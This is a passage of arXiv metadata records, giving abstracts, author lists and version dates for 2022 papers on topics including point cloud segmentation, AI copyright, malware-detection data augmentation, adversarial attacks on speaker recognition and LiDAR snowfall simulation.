clustering simultaneously using the graph representation of a 3D point cloud.
To segment the traversable ground, a point cloud is encoded into a graph
structure, tri-grid field, which treats each tri-grid as a node. Then, the
traversable regions are searched and redefined by examining local convexity and
concavity of edges that connect nodes. On the other hand, our above-ground
object segmentation employs a graph structure by representing a group of
horizontally neighboring 3D points in a spherical-projection space as a node
and vertical/horizontal relationship between nodes as an edge. Fully leveraging
the node-edge structure, the above-ground segmentation ensures real-time
operation and mitigates over-segmentation. Through experiments using
simulations, urban scenes, and our own datasets, we have demonstrated that our
proposed traversable ground segmentation algorithm outperforms other
state-of-the-art methods in terms of the conventional metrics and that our
newly proposed evaluation metrics are meaningful for assessing the above-ground
segmentation. We will make the code and our own dataset available to public at
https://github.com/url-kaist/TRAVEL.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 11:24:48 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Oh",
"Minho",
""
],
[
"Jung",
"Euigon",
""
],
[
"Lim",
"Hyungtae",
""
],
[
"Song",
"Wonho",
""
],
[
"Hu",
"Sumin",
""
],
[
"Lee",
"Eungchang Mason",
""
],
[
"Park",
"Junghee",
""
],
[
"Kim",
"Jaekyung",
""
],
[
"Lee",
"Jangwoo",
""
],
[
"Myung",
"Hyun",
""
]
] |
new_dataset
| 0.964783 |
2206.03215
|
Fabio Lobato
|
F\'abio Manoel Fran\c{c}a Lobato
|
Prote\c{c}\~ao intelectual de obras produzidas por sistemas baseados em
intelig\^encia artificial: uma vis\~ao tecnicista sobre o tema
|
in Portuguese language. Texto publicado pelo Instituto Observat\'orio
de Direito Autoral, dispon\'ivel em:
https://ioda.org.br/protecao-intelectual-de-obras-produzidas-por-sistemas-baseados-em-inteligencia-artificial-uma-visao-tecnicista-sobre-o-tema/
| null | null | null |
cs.CY
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
The pervasiveness of Artificial Intelligence (AI) is unquestionable in our
society. Even in the arts, AI is present. A notorious case is the song "Hey
Ya!" of the OutKast group, successful in the 2000s. At this time, the music
industry began to make decisions based on data to strategize based on
predictions of listeners' habits. This case is just one of the countless
examples of AI applications in the arts. The advent of deep learning made it
possible to build systems capable of accurately recognizing artistic style in
paintings. Content generation is also possible; for example, Deepart customizes
images from two \textit{inputs}: 1) an image to be customized; 2) a style of
painting. The generation of songs according to specific styles from AI-based
systems is also possible. Such possibilities raise questions about the
intellectual property of such works. On this occasion, who owns the copyright
of a work produced from a system based on Artificial Intelligence? To the
creator of the AI? The company/corporation that subsidized the development of
this system? Or AI itself as a creator? This essay aims to contribute with a
technicist view on the discussion of copyright applicability from works
produced by AI.
|
[
{
"version": "v1",
"created": "Wed, 11 May 2022 12:07:47 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Lobato",
"Fábio Manoel França",
""
]
] |
new_dataset
| 0.982067 |
2206.03227
|
Shadrokh Samavi
|
Altanai Bisht, Arielle Wilson, Zachary Jeffreys, Shadrokh Samavi
|
Does Crypto Kill? Relationship between Electricity Consumption Carbon
Footprints and Bitcoin Transactions
|
8 pages, 17 figures
| null | null | null |
cs.CY cs.CR cs.LG
|
http://creativecommons.org/licenses/by/4.0/
|
Cryptocurrencies are gaining more popularity due to their security, making
counterfeits impossible. However, these digital currencies have been criticized
for creating a large carbon footprint due to their algorithmic complexity and
decentralized system design for proof of work and mining. We hypothesize that
the carbon footprint of cryptocurrency transactions has a higher dependency on
carbon-rich fuel sources than green or renewable fuel sources. We provide a
machine learning framework to model such transactions and correlate them with
the electricity generation patterns to estimate and analyze their carbon cost.
|
[
{
"version": "v1",
"created": "Mon, 16 May 2022 18:03:45 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Bisht",
"Altanai",
""
],
[
"Wilson",
"Arielle",
""
],
[
"Jeffreys",
"Zachary",
""
],
[
"Samavi",
"Shadrokh",
""
]
] |
new_dataset
| 0.957817 |
2206.03242
|
Moses Njagi Mwaniki
|
Njagi Moses Mwaniki and Erik Garrison and Nadia Pisanti
|
Fast Exact String to D-Texts Alignments
| null | null | null | null |
cs.DS q-bio.GN
|
http://creativecommons.org/licenses/by/4.0/
|
In recent years, aligning a sequence to a pangenome has become a central
problem in genomics and pangenomics. A fast and accurate solution to this
problem can serve as a toolkit to many crucial tasks such as read-correction,
Multiple Sequences Alignment (MSA), genome assemblies, variant calling, just to
name a few. In this paper we propose a new, fast and exact method to align a
string to a D-string, the latter possibly representing an MSA, a pan-genome or
a partial assembly. An implementation of our tool dsa is publicly available at
https://github.com/urbanslug/dsa
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 12:56:56 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Mwaniki",
"Njagi Moses",
""
],
[
"Garrison",
"Erik",
""
],
[
"Pisanti",
"Nadia",
""
]
] |
new_dataset
| 0.987847 |
2206.03259
|
Alexandru Iosup
|
Alexandru Iosup (VU University Amsterdam), Fernando Kuipers (Delft
University of Technology), Ana Lucia Varbanescu (University of Twente), Paola
Grosso (University of Amsterdam), Animesh Trivedi (VU University Amsterdam),
Jan Rellermeyer (Delft University of Technology), Lin Wang (VU University
Amsterdam), Alexandru Uta (University of Leiden), Francesco Regazzoni
(University of Amsterdam)
|
Future Computer Systems and Networking Research in the Netherlands: A
Manifesto
|
Position paper: 7 foundational research themes in computer science
and networking research, 4 advances with outstanding impact on society, 10
recommendations, 50 pages. Co-signatories from (alphabetical order): ASTRON,
CWI, Gaia-X NL, NIKHEF, RU Groningen, SIDN Labs, Solvinity, SURF, TNO, TU/e,
TU Delft, UvA, U. Leiden, U. Twente, VU Amsterdam
| null | null | null |
cs.CY
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Our modern society and competitive economy depend on a strong digital
foundation and, in turn, on sustained research and innovation in computer
systems and networks (CompSys). With this manifesto, we draw attention to
CompSys as a vital part of ICT. Among ICT technologies, CompSys covers all the
hardware and all the operational software layers that enable applications; only
application-specific details, and often only application-specific algorithms,
are not part of CompSys. Each of the Top Sectors of the Dutch Economy, each
route in the National Research Agenda, and each of the UN Sustainable
Development Goals pose challenges that cannot be addressed without
groundbreaking CompSys advances. Looking at the 2030-2035 horizon, important
new applications will emerge only when enabled by CompSys developments.
Triggered by the COVID-19 pandemic, millions moved abruptly online, raising
infrastructure scalability and data sovereignty issues; but governments
processing social data and responsible social networks still require a paradigm
shift in data sovereignty and sharing. AI already requires massive computer
systems which can cost millions per training task, but the current technology
leaves an unsustainable energy footprint including large carbon emissions.
Computational sciences such as bioinformatics, and "Humanities for all" and
"citizen data science", cannot become affordable and efficient until computer
systems take a generational leap. Similarly, the emerging quantum internet
depends on (traditional) CompSys to bootstrap operation for the foreseeable
future. Large commercial sectors, including finance and manufacturing, require
specialized computing and networking or risk becoming uncompetitive. And, at
the core of Dutch innovation, promising technology hubs, deltas, ports, and
smart cities, could see their promise stagger due to critical dependency on
non-European technology.
|
[
{
"version": "v1",
"created": "Thu, 26 May 2022 11:02:29 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Iosup",
"Alexandru",
"",
"VU University Amsterdam"
],
[
"Kuipers",
"Fernando",
"",
"Delft\n University of Technology"
],
[
"Varbanescu",
"Ana Lucia",
"",
"University of Twente"
],
[
"Grosso",
"Paola",
"",
"University of Amsterdam"
],
[
"Trivedi",
"Animesh",
"",
"VU University Amsterdam"
],
[
"Rellermeyer",
"Jan",
"",
"Delft University of Technology"
],
[
"Wang",
"Lin",
"",
"VU University\n Amsterdam"
],
[
"Uta",
"Alexandru",
"",
"University of Leiden"
],
[
"Regazzoni",
"Francesco",
"",
"University of Amsterdam"
]
] |
new_dataset
| 0.99919 |
2206.03265
|
Michael Wong
|
Michael D. Wong, Edward Raff, James Holt, Ravi Netravali
|
Marvolo: Programmatic Data Augmentation for Practical ML-Driven Malware
Detection
|
15 pages, 7 figures
| null | null | null |
cs.CR cs.LG
|
http://creativecommons.org/licenses/by/4.0/
|
Data augmentation has been rare in the cyber security domain due to technical
difficulties in altering data in a manner that is semantically consistent with
the original data. This shortfall is particularly onerous given the unique
difficulty of acquiring benign and malicious training data that runs into
copyright restrictions, and that institutions like banks and governments
receive targeted malware that will never exist in large quantities. We present
MARVOLO, a binary mutator that programmatically grows malware (and benign)
datasets in a manner that boosts the accuracy of ML-driven malware detectors.
MARVOLO employs semantics-preserving code transformations that mimic the
alterations that malware authors and defensive benign developers routinely make
in practice , allowing us to generate meaningful augmented data. Crucially,
semantics-preserving transformations also enable MARVOLO to safely propagate
labels from original to newly-generated data samples without mandating
expensive reverse engineering of binaries. Further, MARVOLO embeds several key
optimizations that keep costs low for practitioners by maximizing the density
of diverse data samples generated within a given time (or resource) budget.
Experiments using wide-ranging commercial malware datasets and a recent
ML-driven malware detector show that MARVOLO boosts accuracies by up to 5%,
while operating on only a small fraction (15%) of the potential input binaries.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 13:18:31 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Wong",
"Michael D.",
""
],
[
"Raff",
"Edward",
""
],
[
"Holt",
"James",
""
],
[
"Netravali",
"Ravi",
""
]
] |
new_dataset
| 0.999749 |
2206.03274
|
Shiva Kazemi Taskou
|
Shiva Kazemi Taskou, Mehdi Rasti, and Pedro H. J. Nardelli
|
Minimizing Energy Consumption for End-to-End Slicing in 5G Wireless
Networks and Beyond
|
6 pages, Published in WCNC 2022
| null |
10.1109/WCNC51071.2022.9771610
| null |
cs.NI
|
http://creativecommons.org/publicdomain/zero/1.0/
|
End-to-End (E2E) network slicing enables wireless networks to provide diverse
services on a common infrastructure. Each E2E slice, including resources of
radio access network (RAN) and core network, is rented to mobile virtual
network operators (MVNOs) to provide a specific service to end-users. RAN
slicing, which is realized through wireless network virtualization, involves
sharing the frequency spectrum and base station antennas in RAN. Similarly, in
core slicing, which is achieved by network function virtualization, data center
resources such as commodity servers and physical links are shared between users
of different MVNOs. In this paper, we study E2E slicing with the aim of
minimizing the total energy consumption. The stated optimization problem is
non-convex that is solved by a sub-optimal algorithm proposed here. The
simulation results show that our proposed joint power control, server and link
allocation (JPSLA) algorithm achieves 30% improvement compared to the disjoint
scheme, where RAN and core are sliced separately.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 13:24:48 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Taskou",
"Shiva Kazemi",
""
],
[
"Rasti",
"Mehdi",
""
],
[
"Nardelli",
"Pedro H. J.",
""
]
] |
new_dataset
| 0.988698 |
2206.03312
|
Arthur Juliani
|
Arthur Juliani, Samuel Barnett, Brandon Davis, Margaret Sereno, Ida
Momennejad
|
Neuro-Nav: A Library for Neurally-Plausible Reinforcement Learning
| null | null | null | null |
cs.NE cs.AI cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this work we propose Neuro-Nav, an open-source library for neurally
plausible reinforcement learning (RL). RL is among the most common modeling
frameworks for studying decision making, learning, and navigation in biological
organisms. In utilizing RL, cognitive scientists often handcraft environments
and agents to meet the needs of their particular studies. On the other hand,
artificial intelligence researchers often struggle to find benchmarks for
neurally and biologically plausible representation and behavior (e.g., in
decision making or navigation). In order to streamline this process across both
fields with transparency and reproducibility, Neuro-Nav offers a set of
standardized environments and RL algorithms drawn from canonical behavioral and
neural studies in rodents and humans. We demonstrate that the toolkit
replicates relevant findings from a number of studies across both cognitive
science and RL literatures. We furthermore describe ways in which the library
can be extended with novel algorithms (including deep RL) and environments to
address future research needs of the field.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 16:33:36 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Juliani",
"Arthur",
""
],
[
"Barnett",
"Samuel",
""
],
[
"Davis",
"Brandon",
""
],
[
"Sereno",
"Margaret",
""
],
[
"Momennejad",
"Ida",
""
]
] |
new_dataset
| 0.983712 |
2206.03351
|
Fu Song
|
Guangke Chen and Zhe Zhao and Fu Song and Sen Chen and Lingling Fan
and Yang Liu
|
AS2T: Arbitrary Source-To-Target Adversarial Attack on Speaker
Recognition Systems
| null | null | null | null |
cs.SD cs.CR cs.LG eess.AS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Recent work has illuminated the vulnerability of speaker recognition systems
(SRSs) against adversarial attacks, raising significant security concerns in
deploying SRSs. However, they considered only a few settings (e.g., some
combinations of source and target speakers), leaving many interesting and
important settings in real-world attack scenarios alone. In this work, we
present AS2T, the first attack in this domain which covers all the settings,
thus allows the adversary to craft adversarial voices using arbitrary source
and target speakers for any of three main recognition tasks. Since none of the
existing loss functions can be applied to all the settings, we explore many
candidate loss functions for each setting including the existing and newly
designed ones. We thoroughly evaluate their efficacy and find that some
existing loss functions are suboptimal. Then, to improve the robustness of AS2T
towards practical over-the-air attack, we study the possible distortions
occurred in over-the-air transmission, utilize different transformation
functions with different parameters to model those distortions, and incorporate
them into the generation of adversarial voices. Our simulated over-the-air
evaluation validates the effectiveness of our solution in producing robust
adversarial voices which remain effective under various hardware devices and
various acoustic environments with different reverberation, ambient noises, and
noise levels. Finally, we leverage AS2T to perform thus far the largest-scale
evaluation to understand transferability among 14 diverse SRSs. The
transferability analysis provides many interesting and useful insights which
challenge several findings and conclusion drawn in previous works in the image
domain. Our study also sheds light on future directions of adversarial attacks
in the speaker recognition domain.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 14:38:55 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Chen",
"Guangke",
""
],
[
"Zhao",
"Zhe",
""
],
[
"Song",
"Fu",
""
],
[
"Chen",
"Sen",
""
],
[
"Fan",
"Lingling",
""
],
[
"Liu",
"Yang",
""
]
] |
new_dataset
| 0.997838 |
2206.03418
|
Ichiro Hasuo
|
Ichiro Hasuo
|
Responsibility-Sensitive Safety: an Introduction with an Eye to Logical
Foundations and Formalization
|
10 pages
| null | null | null |
cs.RO cs.LO
|
http://creativecommons.org/licenses/by/4.0/
|
Responsibility-sensitive safety (RSS) is an approach to the safety of
automated driving systems (ADS). It aims to introduce mathematically formulated
safety rules, compliance with which guarantees collision avoidance as a
mathematical theorem. However, despite the emphasis on mathematical and logical
guarantees, the logical foundations and formalization of RSS are largely an
unexplored topic of study. In this paper, we present an introduction to RSS,
one that we expect will bridge between different research communities and pave
the way to a logical theory of RSS, its mathematical formalization, and
software tools of practical use.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 16:07:42 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Hasuo",
"Ichiro",
""
]
] |
new_dataset
| 0.957167 |
2206.03469
|
Alice Moallemy-Oureh
|
Alice Moallemy-Oureh, Silvia Beddar-Wiesing, R\"udiger Nather,
Josephine M. Thomas
|
FDGNN: Fully Dynamic Graph Neural Network
| null | null | null | null |
cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Dynamic Graph Neural Networks recently became more and more important as
graphs from many scientific fields, ranging from mathematics, biology, social
sciences, and physics to computer science, are dynamic by nature. While
temporal changes (dynamics) play an essential role in many real-world
applications, most of the models in the literature on Graph Neural Networks
(GNN) process static graphs. The few GNN models on dynamic graphs only consider
exceptional cases of dynamics, e.g., node attribute-dynamic graphs or
structure-dynamic graphs limited to additions or changes to the graph's edges,
etc. Therefore, we present a novel Fully Dynamic Graph Neural Network (FDGNN)
that can handle fully-dynamic graphs in continuous time. The proposed method
provides a node and an edge embedding that includes their activity to address
added and deleted nodes or edges, and possible attributes. Furthermore, the
embeddings specify Temporal Point Processes for each event to encode the
distributions of the structure- and attribute-related incoming graph events. In
addition, our model can be updated efficiently by considering single events for
local retraining.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 17:40:51 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Moallemy-Oureh",
"Alice",
""
],
[
"Beddar-Wiesing",
"Silvia",
""
],
[
"Nather",
"Rüdiger",
""
],
[
"Thomas",
"Josephine M.",
""
]
] |
new_dataset
| 0.999304 |
1808.03830
|
Ioannis Kontoyiannis
|
Dimitris Cheliotis and Ioannis Kontoyiannis and Michail Loulakis and
Stavros Toumpis
|
A Simple Network of Nodes Moving on the Circle
|
Preliminary versions of some of the present results appeared in ISIT
2017 and SPAWC 2018
|
Random Structures & Algorithms 57 (2), 317-338 (2020)
|
10.1002/rsa.20932
| null |
cs.IT math.IT math.PR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Two simple Markov processes are examined, one in discrete and one in
continuous time, arising from idealized versions of a transmission protocol for
mobile, delay-tolerant networks. We consider two independent walkers moving
with constant speed on either the discrete or continuous circle, and changing
directions at independent geometric (respectively, exponential) times. One of
the walkers carries a message that wishes to travel as far and as fast as
possible in the clockwise direction. The message stays with its current carrier
unless the two walkers meet, the carrier is moving counter-clockwise, and the
other walker is moving clockwise. In that case, the message jumps to the other
walker. The long-term average clockwise speed of the message is computed. An
explicit expression is derived via the solution of an associated boundary value
problem in terms of the generator of the underlying Markov process. The average
transmission cost is also similarly computed, measured as the long-term number
of jumps the message makes per unit time. The tradeoff between speed and cost
is examined, as a function of the underlying problem parameters.
|
[
{
"version": "v1",
"created": "Sat, 11 Aug 2018 16:28:42 GMT"
},
{
"version": "v2",
"created": "Wed, 4 Mar 2020 15:56:22 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cheliotis",
"Dimitris",
""
],
[
"Kontoyiannis",
"Ioannis",
""
],
[
"Loulakis",
"Michail",
""
],
[
"Toumpis",
"Stavros",
""
]
] |
new_dataset
| 0.996885 |
2009.07133
|
D. M. Anisuzzaman
|
D. M. Anisuzzaman (1), Yash Patel (1), Jeffrey Niezgoda (2), Sandeep
Gopalakrishnan (3), and Zeyun Yu (1,4) ((1) Department of Computer Science,
University of Wisconsin-Milwaukee, Milwaukee, WI, USA,(2) Advancing the
Zenith of Healthcare (AZH) Wound and Vascular Center, Milwaukee, WI, USA, (3)
College of Nursing, University of Wisconsin Milwaukee, Milwaukee, WI, USA,(4)
Department of Biomedical Engineering, University of Wisconsin-Milwaukee,
Milwaukee, WI, USA.)
|
A Mobile App for Wound Localization using Deep Learning
|
8 pages, 5 figures, 1 table
|
IEEE Access. 30 May 2022
|
10.1109/ACCESS.2022.3179137
| null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
We present an automated wound localizer from 2D wound and ulcer images by
using deep neural network, as the first step towards building an automated and
complete wound diagnostic system. The wound localizer has been developed by
using YOLOv3 model, which is then turned into an iOS mobile application. The
developed localizer can detect the wound and its surrounding tissues and
isolate the localized wounded region from images, which would be very helpful
for future processing such as wound segmentation and classification due to the
removal of unnecessary regions from wound images. For Mobile App development
with video processing, a lighter version of YOLOv3 named tiny-YOLOv3 has been
used. The model is trained and tested on our own image dataset in collaboration
with AZH Wound and Vascular Center, Milwaukee, Wisconsin. The YOLOv3 model is
compared with SSD model, showing that YOLOv3 gives a mAP value of 93.9%, which
is much better than the SSD model (86.4%). The robustness and reliability of
these models are also tested on a publicly available dataset named Medetec and
shows a very good performance as well.
|
[
{
"version": "v1",
"created": "Tue, 15 Sep 2020 14:35:29 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Anisuzzaman",
"D. M.",
""
],
[
"Patel",
"Yash",
""
],
[
"Niezgoda",
"Jeffrey",
""
],
[
"Gopalakrishnan",
"Sandeep",
""
],
[
"Yu",
"Zeyun",
""
]
] |
new_dataset
| 0.993453 |
2011.03085
|
Rinu Boney
|
Rinu Boney, Jussi Sainio, Mikko Kaivola, Arno Solin, Juho Kannala
|
RealAnt: An Open-Source Low-Cost Quadruped for Education and Research in
Real-World Reinforcement Learning
| null | null | null | null |
cs.RO cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Current robot platforms available for research are either very expensive or
unable to handle the abuse of exploratory controls in reinforcement learning.
We develop RealAnt, a minimal low-cost physical version of the popular `Ant'
benchmark used in reinforcement learning. RealAnt costs only $\sim$350 EUR
(\$410) in materials and can be assembled in less than an hour. We validate the
platform with reinforcement learning experiments and provide baseline results
on a set of benchmark tasks. We demonstrate that the RealAnt robot can learn to
walk from scratch from less than 10 minutes of experience. We also provide
simulator versions of the robot (with the same dimensions, state-action spaces,
and delayed noisy observations) in the MuJoCo and PyBullet simulators. We
open-source hardware designs, supporting software, and baseline results for
educational use and reproducible research.
|
[
{
"version": "v1",
"created": "Thu, 5 Nov 2020 20:26:22 GMT"
},
{
"version": "v2",
"created": "Sat, 4 Jun 2022 07:59:42 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Boney",
"Rinu",
""
],
[
"Sainio",
"Jussi",
""
],
[
"Kaivola",
"Mikko",
""
],
[
"Solin",
"Arno",
""
],
[
"Kannala",
"Juho",
""
]
] |
new_dataset
| 0.999272 |
2105.14508
|
Luca Giuzzi DPhil
|
Angela Aguglia, Michela Ceria, Luca Giuzzi
|
Some hypersurfaces over finite fields, minimal codes and secret sharing
schemes
|
20 pages; fully revised version
|
Designs, Codes and Cryptography (2022) 90:1503-1519
|
10.1007/s10623-022-01051-1
| null |
cs.IT math.CO math.IT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Linear error-correcting codes can be used for constructing secret sharing
schemes; however finding in general the access structures of these secret
sharing schemes and, in particular, determining efficient access structures is
difficult. Here we investigate the properties of certain algebraic
hypersurfaces over finite fields, whose intersection numbers with any
hyperplane only takes a few values; these varieties give rise to $q$-divisible
linear codes with at most $5$ weights. Furthermore, for $q$ odd these codes
turn out to be minimal and we characterize the access structures of the secret
sharing schemes based on their dual codes. Indeed, the secret sharing schemes
thus obtained are democratic, that is each participant belongs to the same
number of minimal access sets and can easily be described.
|
[
{
"version": "v1",
"created": "Sun, 30 May 2021 11:35:46 GMT"
},
{
"version": "v2",
"created": "Thu, 3 Jun 2021 15:57:42 GMT"
},
{
"version": "v3",
"created": "Thu, 26 Aug 2021 09:14:34 GMT"
},
{
"version": "v4",
"created": "Tue, 11 Jan 2022 21:03:08 GMT"
},
{
"version": "v5",
"created": "Sun, 5 Jun 2022 13:59:11 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Aguglia",
"Angela",
""
],
[
"Ceria",
"Michela",
""
],
[
"Giuzzi",
"Luca",
""
]
] |
new_dataset
| 0.990747 |
2109.01817
|
Kamal Singh
|
Kamal Singh, Chandradeep Singh, and Kuang-Hao Liu
|
Low SNR Capacity of Keyhole MIMO Channel in Nakagami-m Fading With Full
CSI
| null | null | null | null |
cs.IT eess.SP math.IT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this paper, we obtain asymptotic expressions for the ergodic capacity of
the keyhole multiple-input multiple-output (MIMO) channel at low
signal-to-noise ratio (SNR) in independent and identically distributed
Nakagami-$m$ fading conditions with perfect channel state information at the
transmitter and receiver. We show that the low-SNR capacity of this keyhole
MIMO channel scales proportionally as $\frac{\textrm{SNR}}{4} \log^2
\left(1/{\textrm{SNR}}\right)$. Our main contribution is to identify a
surprising result that the low-SNR capacity of the MIMO fading channel
increases in the presence of keyhole degenerate condition, which is in direct
contrast to the well-known MIMO capacity degradation at high SNR under keyhole
conditions. To explain why rank-deficient keyhole fading channel outperforms
the full-rank MIMO fading channel at sufficiently low-SNR, we remark that the
rank of the MIMO channel matrix has no impact in the low-SNR regime and that
the double-faded (or double-scattering) nature of the keyhole MIMO channel
creates more opportunistic communications at low-SNR when compared with pure
MIMO fading channel which leads to increased capacity. Finally, we also show
that a simple one-bit channel information based on-off power control achieves
this low-SNR capacity; surprisingly, this power adaptation is robust against
both moderate and severe fading for a wide range of low SNR values. These
results also hold for the keyhole MIMO Rayleigh channel as a special case.
|
[
{
"version": "v1",
"created": "Sat, 4 Sep 2021 08:33:52 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Sep 2021 02:04:47 GMT"
},
{
"version": "v3",
"created": "Fri, 24 Dec 2021 05:47:14 GMT"
},
{
"version": "v4",
"created": "Fri, 31 Dec 2021 05:17:10 GMT"
},
{
"version": "v5",
"created": "Mon, 30 May 2022 16:37:10 GMT"
},
{
"version": "v6",
"created": "Sun, 5 Jun 2022 12:05:52 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Singh",
"Kamal",
""
],
[
"Singh",
"Chandradeep",
""
],
[
"Liu",
"Kuang-Hao",
""
]
] |
new_dataset
| 0.992814 |
2111.02006
|
Karn N Watcharasupat
|
Kenneth Ooi, Karn N. Watcharasupat, Santi Peksi, Furi Andi Karnapi,
Zhen-Ting Ong, Danny Chua, Hui-Wen Leow, Li-Long Kwok, Xin-Lei Ng, Zhen-Ann
Loh, and Woon-Seng Gan
|
A Strongly-Labelled Polyphonic Dataset of Urban Sounds with
Spatiotemporal Context
|
7 pages, 8 figures, 3 tables. To be published in Proceedings of the
13th Asia Pacific Signal and Information Processing Association Annual Summit
and Conference, 2021
|
Proceedings of the 2021 Asia-Pacific Signal and Information
Processing Association Annual Summit and Conference (APSIPA ASC), 2021, pp.
982-988
| null | null |
cs.SD eess.AS
|
http://creativecommons.org/licenses/by-sa/4.0/
|
This paper introduces SINGA:PURA, a strongly labelled polyphonic urban sound
dataset with spatiotemporal context. The data were collected via several
recording units deployed across Singapore as a part of a wireless acoustic
sensor network. These recordings were made as part of a project to identify and
mitigate noise sources in Singapore, but also possess a wider applicability to
sound event detection, classification, and localization. This paper introduces
an accompanying hierarchical label taxonomy, which has been designed to be
compatible with other existing datasets for urban sound tagging while also able
to capture sound events unique to the Singaporean context. This paper details
the data collection, annotation, and processing methodologies for the creation
of the dataset. We further perform exploratory data analysis and include the
performance of a baseline model on the dataset as a benchmark.
|
[
{
"version": "v1",
"created": "Wed, 3 Nov 2021 03:52:34 GMT"
},
{
"version": "v2",
"created": "Thu, 11 Nov 2021 14:43:30 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Ooi",
"Kenneth",
""
],
[
"Watcharasupat",
"Karn N.",
""
],
[
"Peksi",
"Santi",
""
],
[
"Karnapi",
"Furi Andi",
""
],
[
"Ong",
"Zhen-Ting",
""
],
[
"Chua",
"Danny",
""
],
[
"Leow",
"Hui-Wen",
""
],
[
"Kwok",
"Li-Long",
""
],
[
"Ng",
"Xin-Lei",
""
],
[
"Loh",
"Zhen-Ann",
""
],
[
"Gan",
"Woon-Seng",
""
]
] |
new_dataset
| 0.999701 |
2111.14819
|
Xumin Yu
|
Xumin Yu, Lulu Tang, Yongming Rao, Tiejun Huang, Jie Zhou, Jiwen Lu
|
Point-BERT: Pre-training 3D Point Cloud Transformers with Masked Point
Modeling
|
Accepted to CVPR 2022, Project page:
https://point-bert.ivg-research.xyz
| null | null | null |
cs.CV cs.AI cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present Point-BERT, a new paradigm for learning Transformers to generalize
the concept of BERT to 3D point cloud. Inspired by BERT, we devise a Masked
Point Modeling (MPM) task to pre-train point cloud Transformers. Specifically,
we first divide a point cloud into several local point patches, and a point
cloud Tokenizer with a discrete Variational AutoEncoder (dVAE) is designed to
generate discrete point tokens containing meaningful local information. Then,
we randomly mask out some patches of input point clouds and feed them into the
backbone Transformers. The pre-training objective is to recover the original
point tokens at the masked locations under the supervision of point tokens
obtained by the Tokenizer. Extensive experiments demonstrate that the proposed
BERT-style pre-training strategy significantly improves the performance of
standard point cloud Transformers. Equipped with our pre-training strategy, we
show that a pure Transformer architecture attains 93.8% accuracy on ModelNet40
and 83.1% accuracy on the hardest setting of ScanObjectNN, surpassing carefully
designed point cloud models with much fewer hand-made designs. We also
demonstrate that the representations learned by Point-BERT transfer well to new
tasks and domains, where our models largely advance the state-of-the-art of
few-shot point cloud classification task. The code and pre-trained models are
available at https://github.com/lulutang0608/Point-BERT
|
[
{
"version": "v1",
"created": "Mon, 29 Nov 2021 18:59:03 GMT"
},
{
"version": "v2",
"created": "Mon, 6 Jun 2022 07:26:41 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Yu",
"Xumin",
""
],
[
"Tang",
"Lulu",
""
],
[
"Rao",
"Yongming",
""
],
[
"Huang",
"Tiejun",
""
],
[
"Zhou",
"Jie",
""
],
[
"Lu",
"Jiwen",
""
]
] |
new_dataset
| 0.996997 |
2203.15118
|
Martin Hahner
|
Martin Hahner, Christos Sakaridis, Mario Bijelic, Felix Heide, Fisher
Yu, Dengxin Dai, Luc Van Gool
|
LiDAR Snowfall Simulation for Robust 3D Object Detection
|
Oral at CVPR 2022
| null | null | null |
cs.CV cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
3D object detection is a central task for applications such as autonomous
driving, in which the system needs to localize and classify surrounding traffic
agents, even in the presence of adverse weather. In this paper, we address the
problem of LiDAR-based 3D object detection under snowfall. Due to the
difficulty of collecting and annotating training data in this setting, we
propose a physically based method to simulate the effect of snowfall on real
clear-weather LiDAR point clouds. Our method samples snow particles in 2D space
for each LiDAR line and uses the induced geometry to modify the measurement for
each LiDAR beam accordingly. Moreover, as snowfall often causes wetness on the
ground, we also simulate ground wetness on LiDAR point clouds. We use our
simulation to generate partially synthetic snowy LiDAR data and leverage these
data for training 3D object detection models that are robust to snowfall. We
conduct an extensive evaluation using several state-of-the-art 3D object
detection methods and show that our simulation consistently yields significant
performance gains on the real snowy STF dataset compared to clear-weather
baselines and competing simulation approaches, while not sacrificing
performance in clear weather. Our code is available at
www.github.com/SysCV/LiDAR_snow_sim.
|
[
{
"version": "v1",
"created": "Mon, 28 Mar 2022 21:48:26 GMT"
},
{
"version": "v2",
"created": "Sun, 5 Jun 2022 12:17:44 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Hahner",
"Martin",
""
],
[
"Sakaridis",
"Christos",
""
],
[
"Bijelic",
"Mario",
""
],
[
"Heide",
"Felix",
""
],
[
"Yu",
"Fisher",
""
],
[
"Dai",
"Dengxin",
""
],
